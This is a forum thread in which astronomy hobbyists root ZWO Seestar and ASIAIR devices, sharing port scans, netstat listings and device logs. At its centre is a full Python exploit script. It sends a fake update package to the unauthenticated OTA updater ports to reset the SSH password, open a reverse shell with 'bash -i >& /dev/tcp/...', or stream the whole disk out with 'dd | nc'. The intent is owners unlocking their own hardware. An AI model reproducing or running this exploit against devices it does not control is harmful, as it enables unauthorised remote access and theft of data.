186 replies to this topic

[skysurfer]

Command run
So easy to root a device now! Very well done! Can we look at adding this code to GitHub?

This ?

https://github.com/open-astro/linux

[mconsidine]

 

Then, could you connect to it and jailbreak it?

Nope, not yet.  I'm not sure if its well-locked-down, or I'm an idiot, or both.  I hope joshumax can chime in.  nmap shows info like this

22/tcp   open  ssh           OpenSSH 7.9p1 Raspbian 10+deb10u2 (protocol 2.0)

139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1935/tcp open  rtmp
4030/tcp open  jdmn-port
4040/tcp open  yo-main
4350/tcp open  net-device
4361/tcp open  nacnl
4400/tcp open  ds-srv
4500/tcp open  sae-urn
4700/tcp open  netxms-agent
4701/tcp open  netxms-mgmt
4800/tcp open  iims
4801/tcp open  iwec

 

as well as ssh-hostkey for 22

Looks like 139 and 445 are related to Samba shares (workgroup: WORKGROUP)

 

mconsidine

 

EDIT:  this came up later when running nmap with sudo:

 4030/tcp open  napster       WinMX or Lopster Napster P2P client

Dunno if that's some sort of false positive, but the thing does have a speaker

Edited by mconsidine, 11 January 2024 - 02:29 PM.

[joeytroy]

This ?

https://github.com/open-astro/linux

I was talking about the python script in the first post if we could add it to GitHub. That repository you listed is my development repository for OpenAstro. The linux folder is the Kernel I made for the ASIAIR Plus RPi version which support both a 32bit and 64bit operating system, the kernel supports the USB ports as they do not work right out of the box. I don't mind adding this into the OpenAstro GitHub but but since it's not my code I didn't want to assume I could just upload it 

[mconsidine]

I decided to give the original code a shot.

 

... and we're in it seems!

 

 

Attached Thumbnails

• 

[mconsidine]

Output of ls ...

Attached Thumbnails

• 

[skysurfer]

I decided to give the original code a shot.

 

... and we're in it seems!

 

Linux SeeStar 4.19.111 #2 SMP PREEMPT Thu Aug 31 13:55:30 CST 2023 armv71

It runs still 32 bits ?

[Artimon]

Output of ls ...

Great !!

 

by my side, I obtain quite the same, except the zipped file (red) that's missing.

Attached Thumbnails

• 
• 

Edited by Artimon, 11 January 2024 - 04:01 PM.

[Artimon]

Here is the content of the Seestar:

Attached Thumbnails

• 

[mconsidine]

Looks like you modified the .py program  that has the --backup option?  If so, could you post?  Dunno why mine didn't work originally.

mconsidine

[Artimon]

Looks like you modified the .py program  that has the --backup option?  If so, could you post?  Dunno why mine didn't work originally.

mconsidine

[Artimon]

here you are ........: (it's from a former post)

 

# Seestar/ASIAIR jailbreak by @joshumax
# Licensed in the public domain
# Source Thread: https://www.cloudyni...-jailbreak-ssh/
# Mod by Oxofrimbl to handle differnt ports and added a backup and reverse shell option without modifying the ASIAIR

import socket
import os
import hashlib
import sys
import tempfile
import tarfile
import argparse
import socket

JAILBREAK_FILE = 'jailbreak.tar.bz2'

JAILBREAK_SCRIPT = """
sudo mount -o remount,rw /

echo "pi:raspberry" | sudo chpasswd
sync

sudo mount -o remount,ro /
"""

def recv_all(sock):
    text = ''

    while True:
        chunk = sock.recv(1024)
        text += chunk.decode()

        if not chunk or chunk.decode().endswith('\n'):
            break

    return text

def begin_update(address, file):
    s = socket.socket()
    s_ota = socket.socket()

    file_contents = open(file,'rb').read()
    json_str = '{{"id":1,"method":"begin_recv","params":[{{"file_len":{file_len},"file_name":"air","run_update":true,"md5":"{md5}"}}]}}\r\n'
    fsize = os.path.getsize(file)
    fmd5 = hashlib.md5(file_contents).hexdigest()
    json_str = json_str.format(file_len = fsize, md5 = fmd5)

    # Connect to OTA file socket first
    try:
        print("Try to connect to binary port  4361 (legacy?)")
        s_ota.connect((address, 4361))
    except ConnectionRefusedError:
        try:
            print("Connection to 4361 failed, try to connect to binary port 4350 (new?)")
            s_ota.connect((address, 4360))
        except ConnectionRefusedError:
            print("Cannot connect to binary port")
            sys.exit(-2)

    # Then connect to OTA command socket
    s.connect((address, 4350))

    print('Got: ' + recv_all(s))

    print('Sending RPC: {rpc}'.format(rpc = json_str))
    s.sendall(json_str.encode())

    print('Got back: ' + recv_all(s))

    s_ota.sendall(file_contents)

    s_ota.close()
    s.close()

def create_patch(script_content=""):
    with tempfile.NamedTemporaryFile (mode='w+b',delete=False) as tf:
        #Create reverse shell to client
        tf.write(b'#!/bin/bash\n')
        tf.write(bytes(script_content,'UTF-8'))
        tf.close()
        #Create Fake update Package
        with tarfile.open(JAILBREAK_FILE, "w:bz2") as tarhandle:
            tarhandle.add(tf.name, "update_package.sh")

if __name__ == '__main__':
    create_patch()
    parser = argparse.ArgumentParser()
    parser.add_argument('--ip', required=True, help="Set the asiair ip")
    hostname = socket.gethostname()
    client_ip_adress  = socket.gethostbyname(hostname)

    parser.add_argument('--client-ip', help="Client IP in case this client dosnt serve as 'master'", default=client_ip_adress)
    parser.add_argument('--shell', help="Enter IP for reverse-shell connection 'nc -l 4242'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--backup', help="Enter IP for full system backup, client: 'nc -l 4444 | dd of=asiair.img'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--jailbreak', help="PErform a Jailbreak by setting username:password for ssh to pi:raspberry",action=argparse.BooleanOptionalAction)
    args = parser.parse_args()
    client_ip_adress = args.client_ip

    if(not (args.jailbreak or args.backup  or args.shell)):
       print("Please use -h either, perform a jailbreak (rooting device), backup for a TCP port of the full image, or get a reverse shell to a target ip")
       sys.exit(-1)

    if(args.shell):
        create_patch(f"bash -i >& /dev/tcp/{client_ip_adress}/4242 0>&1")
        begin_update(args.ip, JAILBREAK_FILE)
   
    if(args.backup):
        create_patch(f"sudo dd if=/dev/mmcblk0 bs=1M | nc {client_ip_adress} 4444")
        begin_update(args.ip, JAILBREAK_FILE)
   
    if(args.jailbreak):
        create_patch(JAILBREAK_SCRIPT)
        begin_update(args.ip, JAILBREAK_FILE)

 

 

[mconsidine]

Thanks.  I had that and have no idea why it didnt work the first time.    Oh well ...

[mconsidine]

Looks like a couple of the ports are used for communicating with the motors and guider, based on some logs I found. 'Course, since I have only clouds I can't test anything. But it wouldn't surprise me if the focuser and filter have their own ports too.

[joeytroy]

Looks like a couple of the ports are used for communicating with the motors and guider, based on some logs I found. 'Course, since I have only clouds I can't test anything. But it wouldn't surprise me if the focuser and filter have their own ports too.

You are 100% correct. Once you root and get SSH you can run the following command and see guider or imager tied to ports. This is from the ASIAIR Pro, the pigpoid is for the power ports.

root@asiair:~# sudo netstat -tulpn | grep LISTEN
tcp        0      0 0.0.0.0:4040            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4360            0.0.0.0:*               LISTEN      581/zwoair_updater 
tcp        0      0 0.0.0.0:139              0.0.0.0:*               LISTEN      1346/smbd          
tcp        0      0 0.0.0.0:4400            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4500            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:22                0.0.0.0:*               LISTEN      420/sshd           
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      756/pigpiod        
tcp        0      0 0.0.0.0:4700            0.0.0.0:*               LISTEN      786/zwoair_imager  
tcp        0      0 0.0.0.0:445              0.0.0.0:*               LISTEN      1346/smbd          
tcp        0      0 0.0.0.0:4030            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4350            0.0.0.0:*               LISTEN      581/zwoair_updater 
tcp        0      0 0.0.0.0:4800            0.0.0.0:*               LISTEN      786/zwoair_imager  
tcp        0      0 0.0.0.0:4801            0.0.0.0:*               LISTEN      786/zwoair_imager

[Artimon]

 

You are 100% correct. Once you root and get SSH you can run the following command and see guider or imager tied to ports. This is from the ASIAIR Pro, the pigpoid is for the power ports.

root@asiair:~# sudo netstat -tulpn | grep LISTEN
tcp        0      0 0.0.0.0:4040            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4360            0.0.0.0:*               LISTEN      581/zwoair_updater 
tcp        0      0 0.0.0.0:139              0.0.0.0:*               LISTEN      1346/smbd          
tcp        0      0 0.0.0.0:4400            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4500            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:22                0.0.0.0:*               LISTEN      420/sshd           
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      756/pigpiod        
tcp        0      0 0.0.0.0:4700            0.0.0.0:*               LISTEN      786/zwoair_imager  
tcp        0      0 0.0.0.0:445              0.0.0.0:*               LISTEN      1346/smbd          
tcp        0      0 0.0.0.0:4030            0.0.0.0:*               LISTEN      766/zwoair_guider  
tcp        0      0 0.0.0.0:4350            0.0.0.0:*               LISTEN      581/zwoair_updater 
tcp        0      0 0.0.0.0:4800            0.0.0.0:*               LISTEN      786/zwoair_imager  
tcp        0      0 0.0.0.0:4801            0.0.0.0:*               LISTEN      786/zwoair_imager

and for Seestar S50. So, entry points are well the "updater" ports in both cases, as the other ports are used by system imager/guider

Attached Thumbnails

• 

Edited by Artimon, 12 January 2024 - 06:49 AM.

[Artimon]

Output of ls ...

Would it be possible for you to save then share the zip file zwoasi_factory_v1.5.7_2023-11-6_10-34-27.zip ? Should be interesting to see inside ... Tkx in advance! SteF.

Attached Thumbnails

• 

Edited by Artimon, 12 January 2024 - 07:22 AM.

[mconsidine]

So a pair for the updater that would be send/receive, essentially. The two pairs for "imager" and two for "guider".

I know that 4030 works as the port for it in skysafari from my own setup. I wonder if the motors, camera, focuser and filter each have pairs.

I'll try a test today of logging the traffic while moving the scope, taking a picture and imaging. I found logs showing that activity earlier but didn't parse them, thinking they were related to what-i-thought-were failing ssh attempts.

It's still not clear to me why the "hidden menu" material wouldn't have been in the version of the app running around at that time. I understand it was firmware earlier than 1.9.1, but does anyone know what the app version was?

EDIT : also, what was the drop dates on the firmware and app that removed the hidden menu?

Edited by mconsidine, 12 January 2024 - 07:39 AM.

[mconsidine]

Yes, I can at least provide a listing. I recall it was just a copy of other items in that folder. There are also two other zips, under /etc/zwo. Which is where the esptool stuff is.

[Artimon]

Yes, I can at least provide a listing. I recall it was just a copy of other items in that folder. There are also two other zips, under /etc/zwo. Which is where the esptool stuff is.

Yes, I saw those ones.

I wonder were would it be possible to change the gain value. I saw in the dark frames in the home/.ZWO/darklibrary/ fits files were the gain value is of 80. Would like to test other values from this sheet:

Attached Thumbnails

• 

[mconsidine]

Going on a hunch here ... I came across an big XML file specific to the sensor. A quick scroll through it showed a number of settings. I bet it reads that to initialize. Maybe check that?

[kaicyung]

Going on a hunch here ... I came across an big XML file specific to the sensor. A quick scroll through it showed a number of settings. I bet it reads that to initialize. Maybe check that?

For Seestar? Where do you think it is stored in its filesystem? I can't seem to find that xml specific to the sensor.

[mconsidine]

Check

  /home/pi/svr_log_bk

to see if you have files like "log_guider.txt" and "log_imager.txt".  They may also be incremented, e.g. "log_guider-2.txt".

 

Those seem to show comms with the respective hw on those ports.  E.g. from guider log:

 

1-11_15:10:36.463029 [write_port](tty_write):GAT#
1-11_15:10:36.518520 [ReadCom]e5#
1-11_15:10:36.519194 [do_notify1]<-4400(237):{"jsonrpc":"2.0","Timestamp":"39.554370709","method":"scope_get_equ_coord","result":{"ra":10.721389,"dec":-43.850000},"code":0,"id":15}
1-11_15:10:41.606187 [handle_cli_input_event]->4400:{"id":18,"method":"scope_get_equ_coord"}
1-11_15:10:41.606503 [write_port](tty_write):GR#
1-11_15:10:41.664102 [ReadCom]10:43:22#
1-11_15:10:41.665171 [write_port](tty_write):GD#:GFR2#:GFD2#
1-11_15:10:41.722899 [ReadCom]-43*51:00#
1-11_15:10:41.726824 [ReadCom]0#
1-11_15:10:41.732536 [ReadCom]-1841152#
1-11_15:10:41.732828 [write_port](tty_write):GU

 

From imager log:

 

1-11_15:11:29.926410 [CTrackStateChecker]track=0
1-11_15:11:29.926588 [RegEvent]>ScopeTrack
1-11_15:11:29.926744 [RegEvent]init key ScopeTrack
1-11_15:11:29.926864 [RegEvent]set func pointer
1-11_15:11:29.927011 [startTimer]timer 93b01e38 start
1-11_15:11:29.927092 [SetControlVal]Red: 141
1-11_15:11:29.927256 [ASICAM_SetRawGain]r=141
1-11_15:11:29.927328 [SetControlVal]Blue: 141
1-11_15:11:29.927398 [ASICAM_SetRawGain]b=141
1-11_15:11:29.927540 [RtmpFunc]set bin: 1
1-11_15:11:29.927650 [RtmpFunc]set subframe: 1080x1920
1-11_15:11:29.927978 [SetCamSubframe]bin1, 1920 x 1080, (0, 0)
1-11_15:11:29.928056 [ResetAll]>
1-11_15:11:29.928229 [ResetAll]<
1-11_15:11:29.928300 [RtmpFunc]exp = 500ms, FPS from exp = 2
1-11_15:11:29.928387 [RtmpFunc]Planet Correction disabled
1-11_15:11:29.928451 [RtspFunc]thread start
1-11_15:11:29.928529 [RtspFunc]1080 x 1920, (0, 0)

 

 

1-11_15:11:36.055786 [WaitReq]key ScopeGoto is exist
1-11_15:11:36.214239 [TempChange]pi temp: 50.7->52.5
1-11_15:11:36.218401 [do_notify]<-{"Event":"PiStatus","Timestamp":"99.491132763","temp":52.500000}
1-11_15:11:36.622287 [AddOne]capture FPS = 11.9946
1-11_15:11:36.668791 [AddOne]test_connection 4800 FPS = 0.215381
1-11_15:11:37.056082 [WaitReq]key ScopeGoto: response is empty
1-11_15:11:37.056192 [WaitReq]>ScopeGoto, 1000ms
1-11_15:11:37.056233 [WaitReq]key ScopeGoto is exist
1-11_15:11:38.056455 [WaitReq]key ScopeGoto: response is empty

 

1-11_15:11:39.934880 [WaitReq]< {"jsonrpc":"2.0","Timestamp":"102.962355359","method":"scope_get_equ_coord","result":{"ra":6.263889,"dec":-58.584722},"code":0,"id":55}

1-11_15:11:39.935088 [do_notify1]<-4700(255):{"jsonrpc":"2.0","Timestamp":"102.962355359","method":"scope_get_equ_coord","result":{"ra":6.263889,"dec":-58.584722},"code":0,"id":55}

 

I also note the following :

/home/pi/.ZWO/ASIAIR_guider.xml

/home/pi/.ZWO/ASIAIR_imager.xml

/home/pi/.ZWO/ASIAIR_general.xml

/home/pi/.ZWO/eaf.xml

/etc/iqfiles/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml

/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml.0

/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml.180

/etc/zwo/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml

/oem/etc/iqfiles/imx462_CMK-OT1234-FV0_M00-2MP-F00.xml

 

Admittedly, though, I havent explored the content

[mconsidine]

On a slightly different note ... Has anyone else wondered if it's possible to get the 16 bit (12 data bit) output from the 462 vs the 8bit we get in the videos? Ie how do we get the equivalent of a SER file instead of AVI? I'd like that for solar work.

[Oxofrimbl]

Hi Oxofrimbl,
I did try your script on my seestar firmware v2.06 and did get this back. Do not know what to do with ......

"Got back:
Try to connect to binary port 6000 (legacy?)
Got:
Sending RPC: {"id":1,"method":"begin_recv","params":[{"file_len":264,"file_name":"air","run_update":true,"md5":"79a3831e7e6555f9c0335c824a1aa01b"}]}"

... if you have any idea how to run into it as pi user?! ......

by the way, I have got found those ports:

Tkx,
Stephane.

[Oxofrimbl]

This means your hack was successful;)